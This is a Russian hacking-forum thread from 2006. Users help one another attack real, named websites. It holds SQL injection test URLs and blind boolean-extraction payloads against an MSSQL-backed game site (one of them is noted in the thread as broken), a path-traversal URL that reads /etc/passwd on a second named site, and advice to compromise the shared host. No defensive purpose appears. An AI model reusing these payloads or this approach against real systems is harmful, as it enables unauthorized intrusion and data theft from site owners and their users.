Помогите пожалуйста со сложной Mssql инъекцией.

Discussion in 'Песочница' started by vmn, 11 Dec 2006.

  1. vmn

    vmn Elder - Старейшина

    Joined:
    16 Oct 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Собственно нашел одну инъекцию:
    _http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2--
    _http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1--

    Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.
     
  2. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    читай http://rst.void.ru/papers/mysql_char_brute.txt
    подбирай и перебирай через substring..
    http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring(@@version,1,1))>100)--
    http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring(@@version,1,1))>1)--

    http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+information_schema.tables',1,1))>120)--
    http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+information_schema.tables',1,1))>1)--
     
    _________________________
    #2 c411k, 11 Dec 2006
    Last edited: 11 Dec 2006
  3. vmn

    vmn Elder - Старейшина

    Joined:
    16 Oct 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    update никак не получится сделать? кстати в выражении http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+in formation_schema.tables',1,1))>1)-- нет смысла, так как селект не вычисляется - ты задал его в виде строковой константы. То есть substring('select+top+1+from+information_schema.tables',1,100) = 'select+top+1+from+information_schema.tables'
     
    #3 vmn, 11 Dec 2006
    Last edited: 11 Dec 2006
  4. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    А ты поля перебирал?
    нет
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://la2shop.net/index.php?val=../../../../../../etc/passwd
    На том же ip см. титли.
    Вообще 1gb.ru дырявый до ужоса там винда права поднять банально ломай через хостинг